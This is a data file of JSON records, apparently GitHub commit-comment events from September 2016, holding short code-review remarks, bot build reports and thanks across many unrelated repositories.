{"id":"4588366320","type":"CommitCommentEvent","actor":{"login":"cvanderhaar"},"repo":{"name":"IBM-Bluemix/HybridBanking-FeedbackManager"},"payload":{"comment":{"id":19093003,"position":null,"line":null,"path":null,"commit_id":"7fd415ea68e0e3d99cfde071222d231770c029b2","created_at":"2016-09-20T09:04:33Z","updated_at":"2016-09-20T09:04:33Z","body":"This is still not working error\r\nan instance of the app crashed: failed to accept connections within health check timeout\r\nexit status: 1, CRASHED"}},"created_at":"2016-09-20T09:04:33Z"}
{"id":"4588369628","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"ragrigor/JAVA_rep1"},"payload":{"comment":{"id":19093010,"position":16,"line":19,"path":"sandbox/src/main/java/myclass/one/Point.java","commit_id":"f8526b89a8e6212c4134dfc1ae9f2df74082e1d8","created_at":"2016-09-20T09:05:14Z","updated_at":"2016-09-20T09:05:14Z","body":"public double distance(Point p2){\r\n        return Math.sqrt(Math.pow((p2.x - this.x), 2) + Math.pow((p2.y - this.y), 2));\r\n}"}},"created_at":"2016-09-20T09:05:14Z"}
{"id":"4588373542","type":"CommitCommentEvent","actor":{"login":"rldhont"},"repo":{"name":"3liz/lizmap-web-client"},"payload":{"comment":{"id":19093012,"position":null,"line":null,"path":null,"commit_id":"8263e1c0c2c4e88452f085d7604760d938226157","created_at":"2016-09-20T09:06:00Z","updated_at":"2016-09-20T09:06:00Z","body":"Good idea"}},"created_at":"2016-09-20T09:06:00Z"}
{"id":"4588374725","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19093013,"position":null,"line":null,"path":null,"commit_id":"13310f2e2380efbda3306d07b5f8af3e57700cb8","created_at":"2016-09-20T09:06:14Z","updated_at":"2016-09-20T09:06:14Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=48)"}},"created_at":"2016-09-20T09:06:14Z"}
{"id":"4588374832","type":"CommitCommentEvent","actor":{"login":"LZ-lizhen"},"repo":{"name":"LZ-lizhen/LZTouchID"},"payload":{"comment":{"id":19093014,"position":null,"line":null,"path":null,"commit_id":"73fc59770736d229b6ef8ece75a3fc05ad1143bf","created_at":"2016-09-20T09:06:15Z","updated_at":"2016-09-20T09:06:15Z","body":"哈哈"}},"created_at":"2016-09-20T09:06:15Z"}
{"id":"4588377650","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19093019,"position":null,"line":null,"path":null,"commit_id":"b756250a1cb6ad2a7681dd4eadad8bb0910360de","created_at":"2016-09-20T09:06:47Z","updated_at":"2016-09-20T09:06:47Z","body":"Hi @torognes , that seemed contradictory. What do you think?"}},"created_at":"2016-09-20T09:06:47Z"}
{"id":"4588379212","type":"CommitCommentEvent","actor":{"login":"93Gunit"},"repo":{"name":"93Gunit/FIRST"},"payload":{"comment":{"id":19093021,"position":8,"line":6,"path":"test.c","commit_id":"a3843d9063a4086dfea775eeed4d9ed86f769014","created_at":"2016-09-20T09:07:07Z","updated_at":"2016-09-20T09:07:07Z","body":"잘하자"}},"created_at":"2016-09-20T09:07:07Z"}
{"id":"4588379758","type":"CommitCommentEvent","actor":{"login":"LostCrew"},"repo":{"name":"jmeas/moment-business"},"payload":{"comment":{"id":19093024,"position":null,"line":null,"path":null,"commit_id":"001dd0991be28085e5b91ebf5938357324bece33","created_at":"2016-09-20T09:07:13Z","updated_at":"2016-09-20T09:07:13Z","body":"Thank you!"}},"created_at":"2016-09-20T09:07:13Z"}
{"id":"4588380459","type":"CommitCommentEvent","actor":{"login":"KatiRG"},"repo":{"name":"bird-house/birdhouse-docs"},"payload":{"comment":{"id":19093026,"position":45,"line":47,"path":"docs/source/dev_guide.rst","commit_id":"1154d4dc6def1543b9460f356742d1317c9c8e95","created_at":"2016-09-20T09:07:21Z","updated_at":"2016-09-20T09:07:21Z","body":"should this be: \r\n`~/birdhouse/var/lib/pywps/outputs/${bird}` ?"}},"created_at":"2016-09-20T09:07:21Z"}
{"id":"4588386122","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19093044,"position":3,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel.cs","commit_id":"d2b2e3536ae98f25df4bd8a08876f0ec59273a67","created_at":"2016-09-20T09:08:27Z","updated_at":"2016-09-20T09:08:27Z","body":"HelloWorld.Miscellaneous"}},"created_at":"2016-09-20T09:08:27Z"}
{"id":"4588386241","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19093045,"position":14,"line":null,"path":"index.html","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-20T09:08:29Z","updated_at":"2016-09-20T09:08:29Z","body":"done"}},"created_at":"2016-09-20T09:08:29Z"}
{"id":"4588388600","type":"CommitCommentEvent","actor":{"login":"93Gunit"},"repo":{"name":"93Gunit/FIRST"},"payload":{"comment":{"id":19093052,"position":7,"line":7,"path":"test.c","commit_id":"a3843d9063a4086dfea775eeed4d9ed86f769014","created_at":"2016-09-20T09:08:56Z","updated_at":"2016-09-20T09:08:56Z","body":"응 아니야"}},"created_at":"2016-09-20T09:08:56Z"}
{"id":"4588389008","type":"CommitCommentEvent","actor":{"login":"mer0mingian"},"repo":{"name":"mkneuron/compneuro"},"payload":{"comment":{"id":19093054,"position":null,"line":null,"path":null,"commit_id":"d0ed1d33727ece436a56ee71749f7576dd242b7b","created_at":"2016-09-20T09:09:02Z","updated_at":"2016-09-20T09:09:02Z","body":"Suggest to move this file from 'CNS2015 assignments/week 8' to 'week2'"}},"created_at":"2016-09-20T09:09:02Z"}
{"id":"4588394128","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19093064,"position":6,"line":4,"path":"README.md","commit_id":"27b663b1c8d7d16a348b3c69dfaa124c6861304a","created_at":"2016-09-20T09:10:03Z","updated_at":"2016-09-20T09:10:03Z","body":"![qq1](https://cloud.githubusercontent.com/assets/15604580/18664422/0c873ad4-7f55-11e6-9d1c-44e539986f02.png)\r\n"}},"created_at":"2016-09-20T09:10:03Z"}
{"id":"4588395820","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19093070,"position":14,"line":null,"path":"index.html","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-20T09:10:22Z","updated_at":"2016-09-20T09:10:22Z","body":"is it okay if these section dividing divs aren't expanding to fill the entire window height/width of their section?"}},"created_at":"2016-09-20T09:10:22Z"}
{"id":"4588398043","type":"CommitCommentEvent","actor":{"login":"KatiRG"},"repo":{"name":"bird-house/birdhouse-docs"},"payload":{"comment":{"id":19093076,"position":63,"line":49,"path":"docs/source/dev_guide.rst","commit_id":"1154d4dc6def1543b9460f356742d1317c9c8e95","created_at":"2016-09-20T09:10:48Z","updated_at":"2016-09-20T09:10:48Z","body":"Can you include info about the the url for browser: the address to find your outfiles on the server (`config.outputUrl_path()`) ?"}},"created_at":"2016-09-20T09:10:48Z"}
{"id":"4588399297","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19093077,"position":null,"line":null,"path":null,"commit_id":"1ad4f113a284e77a290e0dfdddf0eb6cc41ac37b","created_at":"2016-09-20T09:11:02Z","updated_at":"2016-09-20T09:11:02Z","body":"@pb00068 Yes, I was aware of that property of discovered_check_candidates().\r\n\r\nIt is not a problem in current master nor in my original patch, and the problem would be solved if you use the alignment condition test, IMHO."}},"created_at":"2016-09-20T09:11:02Z"}
{"id":"4588402646","type":"CommitCommentEvent","actor":{"login":"KatiRG"},"repo":{"name":"bird-house/birdhouse-docs"},"payload":{"comment":{"id":19093082,"position":7,"line":28,"path":"docs/source/dev_guide.rst","commit_id":"1154d4dc6def1543b9460f356742d1317c9c8e95","created_at":"2016-09-20T09:11:42Z","updated_at":"2016-09-20T09:11:42Z","body":"Temporar -> Temporary"}},"created_at":"2016-09-20T09:11:42Z"}
{"id":"4588402942","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19093083,"position":null,"line":null,"path":null,"commit_id":"38b704c434cd9107ba2ceddb70a92a74fd9253da","created_at":"2016-09-20T09:11:45Z","updated_at":"2016-09-20T09:11:45Z","body":"[Code coverage](https://124-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-20T09:11:45Z"}
{"id":"4588408427","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19093091,"position":null,"line":null,"path":null,"commit_id":"ec7ccc4b29f9f5aed1c3ff95f918c4293d788b95","created_at":"2016-09-20T09:12:50Z","updated_at":"2016-09-20T09:12:50Z","body":"Thanks!"}},"created_at":"2016-09-20T09:12:50Z"}
{"id":"4588408780","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19093094,"position":6,"line":4,"path":"README.md","commit_id":"27b663b1c8d7d16a348b3c69dfaa124c6861304a","created_at":"2016-09-20T09:12:55Z","updated_at":"2016-09-20T09:12:55Z","body":"![qq2](https://cloud.githubusercontent.com/assets/15604580/18664516/72515e08-7f55-11e6-86df-20b13bf74484.png)\r\n"}},"created_at":"2016-09-20T09:12:55Z"}
{"id":"4588410895","type":"CommitCommentEvent","actor":{"login":"defer"},"repo":{"name":"feedzai/pdb"},"payload":{"comment":{"id":19093098,"position":23,"line":221,"path":"src/main/java/com/feedzai/commons/sql/abstraction/batch/AbstractBatch.java","commit_id":"939f248834edbae0fbc4b2cb891b4b2fb4562c61","created_at":"2016-09-20T09:13:22Z","updated_at":"2016-09-20T09:13:22Z","body":"Api-wise having a FlushMode enumeration would be more explicit and self documenting. "}},"created_at":"2016-09-20T09:13:22Z"}
{"id":"4588413232","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19093109,"position":5,"line":3,"path":"README.md","commit_id":"27b663b1c8d7d16a348b3c69dfaa124c6861304a","created_at":"2016-09-20T09:13:50Z","updated_at":"2016-09-20T09:13:50Z","body":"![qq3](https://cloud.githubusercontent.com/assets/15604580/18664530/877a1cfc-7f55-11e6-92c0-f354b656823f.png)\r\n![qq4](https://cloud.githubusercontent.com/assets/15604580/18664536/8f100b98-7f55-11e6-98cb-4108b65d9a8f.png)\r\n\r\n"}},"created_at":"2016-09-20T09:13:50Z"}
{"id":"4588413406","type":"CommitCommentEvent","actor":{"login":"timar"},"repo":{"name":"owncloud/richdocuments"},"payload":{"comment":{"id":19093112,"position":null,"line":null,"path":null,"commit_id":"7a0d2b944cde026abd6527bf3e51f41e809faa9c","created_at":"2016-09-20T09:13:52Z","updated_at":"2016-09-20T09:13:52Z","body":"On 09/17/2016 04:40 PM, Lukas Reschke wrote:\n> This breaks saving the settings :-)\n> \nFixed by commit 99873b7331ce909d8c8ce438c8ba87b265b28491\n\nThanks,\n\n-- \nAndras Timar\nProduct Development Manager\nCollabora Productivity Ltd.\nhttps://collaboraoffice.com/\n"}},"created_at":"2016-09-20T09:13:52Z"}
{"id":"4588413811","type":"CommitCommentEvent","actor":{"login":"indutny"},"repo":{"name":"indutny/asn1.js"},"payload":{"comment":{"id":19093114,"position":2,"line":2,"path":".npmignore","commit_id":"c5babeae351faac64ecaaad56cd11f9c4e86c131","created_at":"2016-09-20T09:13:56Z","updated_at":"2016-09-20T09:13:56Z","body":"No, it won't be. They are published separately."}},"created_at":"2016-09-20T09:13:56Z"}
{"id":"4588415292","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19093119,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T09:14:15Z","updated_at":"2016-09-20T09:14:15Z","body":"I'll contact the author about that."}},"created_at":"2016-09-20T09:14:15Z"}
{"id":"4588416659","type":"CommitCommentEvent","actor":{"login":"YX5337934887"},"repo":{"name":"YX5337934887/MyProjects"},"payload":{"comment":{"id":19093123,"position":null,"line":null,"path":null,"commit_id":"f9139911e15857144cf1b1d3ddd9affbbfeb9a6a","created_at":"2016-09-20T09:14:32Z","updated_at":"2016-09-20T09:14:32Z","body":"javassist 源码"}},"created_at":"2016-09-20T09:14:32Z"}
{"id":"4588421353","type":"CommitCommentEvent","actor":{"login":"defer"},"repo":{"name":"feedzai/pdb"},"payload":{"comment":{"id":19093128,"position":23,"line":221,"path":"src/main/java/com/feedzai/commons/sql/abstraction/batch/AbstractBatch.java","commit_id":"939f248834edbae0fbc4b2cb891b4b2fb4562c61","created_at":"2016-09-20T09:15:28Z","updated_at":"2016-09-20T09:15:28Z","body":"Also maybe sync isn't the best name, maybe FlushMode.WhenIdle, because it doesn't really affect the synchronicity of the current call but rather if it should wait for others to finish. "}},"created_at":"2016-09-20T09:15:28Z"}
{"id":"4588421735","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19093130,"position":null,"line":null,"path":null,"commit_id":"8cfc43ed51da94fac8a535820acc8fa8a39e52c2","created_at":"2016-09-20T09:15:32Z","updated_at":"2016-09-20T09:15:32Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2316 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.58%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T09:15:32Z"}
{"id":"4588423437","type":"CommitCommentEvent","actor":{"login":"paulcarroty"},"repo":{"name":"UnitedRPMs/opera"},"payload":{"comment":{"id":19093135,"position":null,"line":null,"path":null,"commit_id":"02e7736fbfd44fb06058307d6b1c6b7a911cde15","created_at":"2016-09-20T09:15:53Z","updated_at":"2016-09-20T09:15:53Z","body":"@kuboosoft why not latest 40.0?"}},"created_at":"2016-09-20T09:15:53Z"}
{"id":"4588426316","type":"CommitCommentEvent","actor":{"login":"srowen"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19093141,"position":15,"line":212,"path":"mllib/src/main/scala/org/apache/spark/ml/classification/ProbabilisticClassifier.scala","commit_id":"26145a5af9a88053c0eaf280206ca2621c8919f6","created_at":"2016-09-20T09:16:24Z","updated_at":"2016-09-20T09:16:24Z","body":"I think this actually subtly changed behavior in the case of ties, because it will now choose the last rather than first among equals. But I'm going to change things in SPARK-17057 to disallow 0 thresholds anyway."}},"created_at":"2016-09-20T09:16:24Z"}
{"id":"4588426486","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"mivade/tornado-tcp-echo-demo"},"payload":{"comment":{"id":19093142,"position":null,"line":null,"path":null,"commit_id":"01d85431866a2cad408775d6c444d28c5839df93","created_at":"2016-09-20T09:16:26Z","updated_at":"2016-09-20T09:16:26Z","body":"Thanks, it helps me!"}},"created_at":"2016-09-20T09:16:26Z"}
{"id":"4588430133","type":"CommitCommentEvent","actor":{"login":"father-mande"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":19093151,"position":null,"line":null,"path":null,"commit_id":"df199617c2ac4928906772b508773946db52a505","created_at":"2016-09-20T09:17:11Z","updated_at":"2016-09-20T09:17:11Z","body":"Hi,  \r\nTested with PREFIX=/opt/kodi17, now all addons are in target place at end of generation ...  \r\nThanks for your help.  \r\nPhilippe."}},"created_at":"2016-09-20T09:17:11Z"}
{"id":"4588436276","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"medialab/hyphe-browser"},"payload":{"comment":{"id":19093160,"position":5,"line":88,"path":"app/components/browser/BrowserTab.js","commit_id":"64f1941a5dc1b968576f0dcb310f8ff63ae06661","created_at":"2016-09-20T09:18:24Z","updated_at":"2016-09-20T09:18:24Z","body":"@delapouite en fait en reregardant la source je n'ai pas l'impression qu'on annonce du tout de favico, tu pourrais me pointer l'url en 200 dont tu parles? view-source:http://www.medialab.sciences-po.fr/fr/"}},"created_at":"2016-09-20T09:18:24Z"}
{"id":"4588443287","type":"CommitCommentEvent","actor":{"login":"ilaripih"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":19093185,"position":null,"line":null,"path":null,"commit_id":"826f3a4bc121b761905ceec7df6a5d0b0ac57aa4","created_at":"2016-09-20T09:19:46Z","updated_at":"2016-09-20T09:19:46Z","body":"We could use GCC's and LLVM's `fsanitize` options to detect out-of-bounds and use-after-free errors, memory leaks and data races."}},"created_at":"2016-09-20T09:19:46Z"}
{"id":"4588445354","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19093187,"position":null,"line":null,"path":null,"commit_id":"1ad4f113a284e77a290e0dfdddf0eb6cc41ac37b","created_at":"2016-09-20T09:20:11Z","updated_at":"2016-09-20T09:20:11Z","body":"@snicolet Yes, thanks. I will submit a 2nd take."}},"created_at":"2016-09-20T09:20:11Z"}
{"id":"4588447610","type":"CommitCommentEvent","actor":{"login":"ajeshbaby"},"repo":{"name":"cloudbytestorage/support-cli-utilities"},"payload":{"comment":{"id":19093191,"position":null,"line":null,"path":null,"commit_id":"6af8aad59480fc95118d2097717b5b04127a6cd2","created_at":"2016-09-20T09:20:39Z","updated_at":"2016-09-20T09:20:39Z","body":"Lets have a segregation at protocol, \r\nEg -- NFS, iSCSI,CIFS\r\nClients Connected\r\nIP Address/Vlan is binded yes or no. Details can go into a file\r\nDetailed like istgtdump etc can go into a file."}},"created_at":"2016-09-20T09:20:39Z"}
{"id":"4588449735","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19093196,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T09:21:05Z","updated_at":"2016-09-20T09:21:05Z","body":"Done: http://forums.openpli.org/topic/34370-plugin-het-weer/?view=findpost&p=590644"}},"created_at":"2016-09-20T09:21:05Z"}
{"id":"4588450646","type":"CommitCommentEvent","actor":{"login":"davidaurelio"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19093199,"position":526,"line":526,"path":"packager/react-packager/src/node-haste/DependencyGraph/ResolutionRequest.js","commit_id":"667aaa4621a9f59b620cb17b39af8dd309ebd0da","created_at":"2016-09-20T09:21:14Z","updated_at":"2016-09-20T09:21:14Z","body":"now I get what you mean. Yes, you are right. It should be `/^[.][.]?(?:[/]|$)/`."}},"created_at":"2016-09-20T09:21:14Z"}
{"id":"4588452711","type":"CommitCommentEvent","actor":{"login":"imanuelcostigan"},"repo":{"name":"imanuelcostigan/RSQLServer"},"payload":{"comment":{"id":19093206,"position":null,"line":null,"path":null,"commit_id":"976a24bd60a301e2f67ca7ff9ce833c9778d1538","created_at":"2016-09-20T09:21:39Z","updated_at":"2016-09-20T09:21:39Z","body":"Yes please"}},"created_at":"2016-09-20T09:21:39Z"}
{"id":"4588455988","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19093212,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T09:22:20Z","updated_at":"2016-09-20T09:22:20Z","body":"But why not make a check/fix in the skin-engine to prevent a crash on such a value?"}},"created_at":"2016-09-20T09:22:20Z"}
{"id":"4588456281","type":"CommitCommentEvent","actor":{"login":"schnello"},"repo":{"name":"volkszaehler/volkszaehler.org"},"payload":{"comment":{"id":19093213,"position":null,"line":null,"path":null,"commit_id":"2c78b241d26e7d7c7c5219a853682f3ec6fb863e","created_at":"2016-09-20T09:22:24Z","updated_at":"2016-09-20T09:22:24Z","body":"Hallo @norbert-walter.\r\n\r\nScript ist leider defekt. Es wurde im Windows format abgespeichert. \r\n\r\n\r\nGrüße"}},"created_at":"2016-09-20T09:22:24Z"}
{"id":"4588458815","type":"CommitCommentEvent","actor":{"login":"hahanigehaha233"},"repo":{"name":"hahanigehaha233/New"},"payload":{"comment":{"id":19093216,"position":null,"line":null,"path":null,"commit_id":"314945f3ca3632edcfe663321254784cd9283f93","created_at":"2016-09-20T09:22:54Z","updated_at":"2016-09-20T09:22:54Z","body":"revert change"}},"created_at":"2016-09-20T09:22:54Z"}
{"id":"4588467150","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":19093233,"position":15,"line":15,"path":"wk3/Hangmanpersonal/SecondPart.js","commit_id":"a19c58bd8630949fd1e1a67151e97729fc19ce5c","created_at":"2016-09-20T09:24:33Z","updated_at":"2016-09-20T09:24:33Z","body":"Shouldn't this be 0 instead of 1 to make sure the first quote gets shown?"}},"created_at":"2016-09-20T09:24:33Z"}
{"id":"4588469357","type":"CommitCommentEvent","actor":{"login":"torognes"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19093238,"position":null,"line":null,"path":null,"commit_id":"b756250a1cb6ad2a7681dd4eadad8bb0910360de","created_at":"2016-09-20T09:24:59Z","updated_at":"2016-09-20T09:24:59Z","body":"The phrase \"All rights reserved\" is part of the copyright statement on the line above it. The phrase is no longer strictly required according to the [wikipedia article about it](https://en.wikipedia.org/wiki/All_rights_reserved), but is often included to emphasise that this is a copyrighted work. We hold the copyright to the software and documentation, but allow others to use it according to one of the two licenses (GPL or BSD). I would leave it as it is."}},"created_at":"2016-09-20T09:24:59Z"}
{"id":"4588469619","type":"CommitCommentEvent","actor":{"login":"BasThomas"},"repo":{"name":"tryswift/trySwiftNYC"},"payload":{"comment":{"id":19093239,"position":null,"line":null,"path":null,"commit_id":"70e950687cb2bc13e6713ae015612246fb96c7d2","created_at":"2016-09-20T09:25:03Z","updated_at":"2016-09-20T09:25:03Z","body":"I didn't know this worked, nice!"}},"created_at":"2016-09-20T09:25:03Z"}
{"id":"4588471905","type":"CommitCommentEvent","actor":{"login":"ikesyo"},"repo":{"name":"bryx-inc/BRYXBanner"},"payload":{"comment":{"id":19093242,"position":null,"line":null,"path":null,"commit_id":"14690e5ae70fe642745c839f2bef202646432479","created_at":"2016-09-20T09:25:30Z","updated_at":"2016-09-20T09:25:30Z","body":"Looks like this commit broke the Carthage support: https://github.com/Carthage/Carthage/issues/1491. I recommend you to audit the project settings."}},"created_at":"2016-09-20T09:25:30Z"}
{"id":"4588473005","type":"CommitCommentEvent","actor":{"login":"v-matsuk"},"repo":{"name":"AlexZhl/BoatsWorld"},"payload":{"comment":{"id":19093244,"position":36,"line":42,"path":"app/Resources/views/admin/users/users.html.twig","commit_id":"8c5219916501fec0d3d32b2486bac59e847dbb2d","created_at":"2016-09-20T09:25:42Z","updated_at":"2016-09-20T09:25:42Z","body":"Думаю, стоит еще label добавить, который ты будешь в thead отображать. И еще, если будет время, подумай все-таки над фильтрами. Я бы предложил что-то аля:\r\nдобавить атрибут filter в описании колонки, у которого обязательно есть атрибут type (text или select) и если это select, то будет еще атрибут options.\r\nИ еще одну тему продумай: нужно поддерживать возможность добавить колонку actions, в которой будут линки на удаление и редактирование. Обрабатывать клики на эти линки ты можешь вне плагина, т.к. будет сложно сделать это универсально."}},"created_at":"2016-09-20T09:25:42Z"}
{"id":"4588473154","type":"CommitCommentEvent","actor":{"login":"anomalchik"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":19093246,"position":null,"line":null,"path":null,"commit_id":"5473560f843833ffba9f2aa2a94dc011c4ee2449","created_at":"2016-09-20T09:25:43Z","updated_at":"2016-09-20T09:25:43Z","body":"Это ускоряет usb зарядку(от компа), но опять же не для нас. Не наш контроллер заряда."}},"created_at":"2016-09-20T09:25:43Z"}
{"id":"4588474661","type":"CommitCommentEvent","actor":{"login":"v-matsuk"},"repo":{"name":"AlexZhl/BoatsWorld"},"payload":{"comment":{"id":19093247,"position":5,"line":26,"path":"src/AppBundle/Controller/Admin/UsersController.php","commit_id":"8c5219916501fec0d3d32b2486bac59e847dbb2d","created_at":"2016-09-20T09:26:01Z","updated_at":"2016-09-20T09:26:01Z","body":"используй queryBuilder"}},"created_at":"2016-09-20T09:26:01Z"}
{"id":"4588477374","type":"CommitCommentEvent","actor":{"login":"llopv"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19093250,"position":2,"line":1,"path":"src/templates/projects/project.html","commit_id":"276b6b1fed71ba510d4de33c3f96e990eb9bcae3","created_at":"2016-09-20T09:26:32Z","updated_at":"2016-09-20T09:26:32Z","body":"You are right. It is to align the headings, you can erase it for the moment."}},"created_at":"2016-09-20T09:26:32Z"}
{"id":"4588481269","type":"CommitCommentEvent","actor":{"login":"eMerzh"},"repo":{"name":"sqlectron/sqlectron-gui"},"payload":{"comment":{"id":19093259,"position":1,"line":1,"path":"docs/development/docker-databases.md","commit_id":"7a296c0ab145eb8ff3230341fa08843afdc28e6c","created_at":"2016-09-20T09:27:18Z","updated_at":"2016-09-20T09:27:18Z","body":"Oups typo , database"}},"created_at":"2016-09-20T09:27:18Z"}
{"id":"4588481328","type":"CommitCommentEvent","actor":{"login":"frangarcj"},"repo":{"name":"frangarcj/pcsx_rearmed"},"payload":{"comment":{"id":19093261,"position":null,"line":null,"path":null,"commit_id":"9facb65b76d846175f3ef9fbeafd1c590a0e0630","created_at":"2016-09-20T09:27:19Z","updated_at":"2016-09-20T09:27:19Z","body":"Thanks "}},"created_at":"2016-09-20T09:27:19Z"}
{"id":"4588485720","type":"CommitCommentEvent","actor":{"login":"jfmengels"},"repo":{"name":"jfmengels/eslint-rule-documentation"},"payload":{"comment":{"id":19093272,"position":null,"line":null,"path":null,"commit_id":"e1c435ba348b558ee12902693e4c21e0acd3d051","created_at":"2016-09-20T09:28:10Z","updated_at":"2016-09-20T09:28:10Z","body":"cc @sindresorhus ;)"}},"created_at":"2016-09-20T09:28:10Z"}
{"id":"4588486876","type":"CommitCommentEvent","actor":{"login":"VAO11"},"repo":{"name":"womenhackfornonprofits/whfnp"},"payload":{"comment":{"id":19093273,"position":null,"line":null,"path":null,"commit_id":"2adba2bc93918f591df7a7151c2b174ae81385bd","created_at":"2016-09-20T09:28:22Z","updated_at":"2016-09-20T09:28:22Z","body":"Morning @lili2311, thanks for applying the fix separately. It looks right to me. "}},"created_at":"2016-09-20T09:28:22Z"}
{"id":"4588487635","type":"CommitCommentEvent","actor":{"login":"dimaqq"},"repo":{"name":"mopemope/meinheld"},"payload":{"comment":{"id":19093275,"position":7,"line":34,"path":"example/chat/chatdemo.py","commit_id":"d86332bc1e2e8c82911b0d582a9f6c6ed838c60c","created_at":"2016-09-20T09:28:31Z","updated_at":"2016-09-20T09:28:31Z","body":"Should it not be `try/finally` ?"}},"created_at":"2016-09-20T09:28:31Z"}
{"id":"4588496118","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19093288,"position":null,"line":null,"path":null,"commit_id":"c0027464296014fb1458c7112964c5db0baba96c","created_at":"2016-09-20T09:30:12Z","updated_at":"2016-09-20T09:30:12Z","body":"Ez a solarized elég jól néz ki, én akár alapértelmezetté is emelném.\r\nhttps://github.com/MalditoBarbudo/solarized_sddm_theme"}},"created_at":"2016-09-20T09:30:12Z"}
{"id":"4588497514","type":"CommitCommentEvent","actor":{"login":"jelhan"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":19093291,"position":5,"line":8,"path":"app/locales/es/translations.js","commit_id":"ed87a86c2c966e7a5505c117ad8c1b8149aed0b3","created_at":"2016-09-20T09:30:26Z","updated_at":"2016-09-20T09:30:26Z","body":"@rugk I don't speak any spanish. Do you mind to add a PR with `texto libre` if you are sure about?"}},"created_at":"2016-09-20T09:30:26Z"}
{"id":"4588498119","type":"CommitCommentEvent","actor":{"login":"llopv"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19093293,"position":5,"line":4,"path":"src/sass/buttons.sass","commit_id":"1c2789b0a52a305fd817d148d40abbded89888d9","created_at":"2016-09-20T09:30:33Z","updated_at":"2016-09-20T09:30:33Z","body":"Ok, latest designed `.btn` should have font size of 14px, and `btn-lg` of 20px."}},"created_at":"2016-09-20T09:30:33Z"}
{"id":"4588501537","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19093297,"position":null,"line":null,"path":null,"commit_id":"efd561e6d3d4c0dac18ae2cb41bbeec723469997","created_at":"2016-09-20T09:31:14Z","updated_at":"2016-09-20T09:31:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IINEpXkRTBCpLCXN8917OQ"}},"created_at":"2016-09-20T09:31:14Z"}
